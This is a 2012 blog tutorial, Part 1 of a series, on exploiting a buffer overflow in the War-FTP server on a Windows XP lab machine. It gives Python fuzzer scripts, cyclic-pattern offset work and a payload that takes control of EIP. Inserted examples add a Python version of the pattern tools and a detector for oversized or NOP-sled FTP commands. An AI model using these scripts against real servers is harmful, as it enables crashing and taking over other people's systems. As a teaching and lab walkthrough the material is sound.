Wednesday, September 19, 2012

Software Exploitation Part 1

In this tutorial, I will try to explain the basics of software exploitation. As the example, I will use a simple application that runs on Windows, called War-FTP. War-FTP is an FTP server for Windows that has no protection against buffer overflows (non-SEH). So, what is a buffer overflow, and what is SEH?

Buffer Overflow

A buffer overflow happens when an application receives a bigger chunk of data than it is expecting, so the data does not fit into the allocated storage space, or buffer. Buffer overflow errors are so common because programmers make mistakes: they fail to foresee that unexpected data values may be entered, and they fail to carry out bounds checking to ensure that any data a user enters falls within the expected range.

SEH

An exception is an event that occurs during the execution of a program and requires the execution of code outside the normal flow of control. Structured exception handling (SEH) is a mechanism for handling both hardware and software exceptions. When an exception reaches the default handler, you typically see a window that offers to send an error report to Microsoft.

Let's Begin!!

Host    : Backtrack 5 R2 (IP address : 192.168.1.1)

Target : Microsoft Windows XP SP3 (IP address 192.168.1.101)

Target app : War-FTP on Windows XP (port 21)

Information gathering

From Nessus:

Description from Nessus (select the finding as shown in the figure above):

The version of War FTP Daemon running on this host contains a buffer overflow in the code that handles the USER and PASS commands. A potential intruder could use this vulnerability to crash the server as well as run arbitrary commands on the system.

After this, we can fuzz the application with a simple fuzzer. We will send 1000 'A' characters to the War-FTP application with the fuzzer below.

#!/usr/bin/python
# file : myfuzzer.py

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buff = b"\x41" * 1000                      # 1000 x 'A'
s.connect(('192.168.1.101', 21))
data = s.recv(1024)                        # read the FTP banner
print("Sending evil data via USER command...")
s.send(b'USER ' + buff + b'\r\n')
data = s.recv(1024)                        # read the reply to USER
s.send(b'PASS PASSWORD ' + b'\r\n')
s.close()
print("Finish")

We run the fuzzer as follows:

Wow... the War-FTP application closed immediately. In this case, the fuzzer crashed War-FTP.

If War-FTP refuses to start again after this, delete FtpDaemon.dat in the War-FTP folder.

Debugger

Now we want to know what happens in War-FTP's memory. For this we will use a debugger on Windows XP, OllyDbg.
Run War-FTP under OllyDbg and then fuzz it again.

Next we will find out after how many bytes the EIP register is overwritten. We will use two small programs, pattern_create.rb and pattern_offset.rb, located in /opt/metasploit/apps/pro/msf3/tools/.

root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_create.rb > string_pattern.txt 

We will use the pattern in string_pattern.txt as the data when we fuzz again.

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 1000-byte cyclic pattern from pattern_create.rb (string_pattern.txt); the
# literal is split over adjacent lines only so it fits on the page
buff = (b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8A"
        b"b9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0"
        b"Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3"
        b"Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5"
        b"Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8"
        b"Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9"
        b"An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0"
        b"Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1"
        b"Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3"
        b"At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4"
        b"Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4"
        b"Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5"
        b"Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6"
        b"Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8"
        b"Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1"
        b"Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B")
s.connect(('192.168.1.101', 21))
data = s.recv(1024)                        # read the FTP banner
print("Sending evil data via USER command...")
s.send(b'USER ' + buff + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD ' + b'\r\n')
s.close()
print("Finish")

Fuzz again, and you will see the following in War-FTP under the debugger:

Now we will calculate where the values we saw in the debugger sit within the pattern generated by pattern_create.rb. We will use pattern_offset.rb:

root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb 32714131
485
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb q4Aq5Aq
493
root@bt:/opt/metasploit/apps/pro/msf3/tools#

Note:
32714131 is the value in EIP at the crash.

q4Aq5Aq is the data at ESP.
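As an added example (not part of the original post), here is a Python re-implementation of what pattern_create.rb and pattern_offset.rb do, so the offsets 485 and 493 above can be reproduced without Metasploit; the function names are my own.

```python
import re
import string

# Added example, not from the original post: the cyclic-pattern logic behind
# pattern_create.rb / pattern_offset.rb, with the post's own values as input.


def pattern_create(length):
    """Build the cyclic pattern Aa0Aa1...Aa9Ab0... truncated to `length` bytes."""
    chunks = []
    total = 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length]
    raise ValueError("length exceeds one full cycle (20280 bytes)")


def pattern_offset(query, length=1000):
    """Return the offset of `query` in the pattern, or None if it is not there.

    `query` is either an 8-hex-digit register value as shown by the debugger
    (e.g. "32714131" from EIP), which is decoded as a little-endian dword back
    into the four ASCII bytes that overwrote it, or a raw string copied from
    the memory dump (e.g. "q4Aq5Aq" from ESP).
    """
    if re.fullmatch(r"[0-9A-Fa-f]{8}", query):
        needle = bytes.fromhex(query)[::-1].decode("latin-1")
    else:
        needle = query
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


if __name__ == "__main__":
    print(pattern_create(1000))
    print("EIP 32714131 ->", pattern_offset("32714131"))   # 485
    print("ESP q4Aq5Aq  ->", pattern_offset("q4Aq5Aq"))    # 493
```

The hex branch mirrors pattern_offset.rb's convention: an 8-hex-digit query is a register value, so a raw 8-character pattern fragment that happens to be all hex digits must be looked up with a longer or shorter substring instead.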

Now we modify our fuzzer as follows:

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buff = b"\x90" * 485                       # 485 bytes of padding up to the saved EIP
buff += b"\xEF\xBE\xAD\xDE"                # EIP becomes 0xDEADBEEF (little-endian), an easy value to spot

s.connect(('192.168.1.101', 21))
data = s.recv(1024)                        # read the FTP banner
print("Sending evil data via USER command...")
s.send(b'USER ' + buff + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD ' + b'\r\n')
s.close()
print("Finish")

Fuzzing again...

Next we modify our fuzzer again as follows:

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buff = b"\x90" * 485                       # padding up to the saved EIP
buff += b"\xEF\xBE\xAD\xDE"                # EIP becomes 0xDEADBEEF
buff += b"\x90" * (493 - len(buff))        # pad up to offset 493, where ESP points
# the original read "\xC", which is an invalid escape; 0xCC (int3 breakpoint)
# is assumed to be what was intended for the filler after ESP
buff += b"\xCC" * (1000 - len(buff))

s.connect(('192.168.1.101', 21))
data = s.recv(1024)                        # read the FTP banner
print("Sending evil data via USER command...")
s.send(b'USER ' + buff + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD ' + b'\r\n')
s.close()
print("Finish")
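From the defender's side, the traffic these fuzzers generate is easy to recognise on the FTP control channel. As an added example (not part of the original post), here is a small checker that flags USER/PASS commands with oversized arguments, non-printable bytes or a run of 0x90 NOPs; the sample lines are constructed here, not captured from the author's lab, and the 256-byte limit is an assumption.

```python
import string

# Added example, not from the original post: defender-side check for FTP
# control-channel commands like the ones the fuzzers above send.

MAX_ARG_LEN = 256                 # assumption: no legitimate user name comes close to this
NOP_SLED = b"\x90" * 8            # a run of x86 NOPs, as used for padding above
PRINTABLE = set(string.printable.encode("ascii"))


def inspect_ftp_command(raw):
    """Return the reasons one FTP command line looks hostile (empty list if clean)."""
    line = raw.rstrip(b"\r\n")
    cmd, _, arg = line.partition(b" ")
    reasons = []
    if cmd.upper() not in (b"USER", b"PASS"):
        return reasons                       # only the two commands Nessus reported
    if len(arg) > MAX_ARG_LEN:
        reasons.append("oversized %s argument (%d bytes)" % (cmd.decode("ascii"), len(arg)))
    if any(byte not in PRINTABLE for byte in arg):
        reasons.append("non-printable bytes in argument")
    if NOP_SLED in arg:
        reasons.append("NOP sled (run of 0x90) in argument")
    return reasons


# Constructed sample traffic: two normal logins and the two payloads from this post.
SAMPLE_COMMANDS = [
    b"USER anonymous\r\n",
    b"PASS guest@example.org\r\n",
    b"USER " + b"\x41" * 1000 + b"\r\n",
    b"USER " + b"\x90" * 485 + b"\xEF\xBE\xAD\xDE" + b"\x90" * 4 + b"\r\n",
]


def scan(commands):
    """Map the index of each suspicious command to its reasons; clean lines are left out."""
    hits = {}
    for i, cmd in enumerate(commands):
        reasons = inspect_ftp_command(cmd)
        if reasons:
            hits[i] = reasons
    return hits


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_COMMANDS).items():
        print("command %d: %s" % (i, "; ".join(reasons)))
```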

Continued in Software Exploitation Part 2.
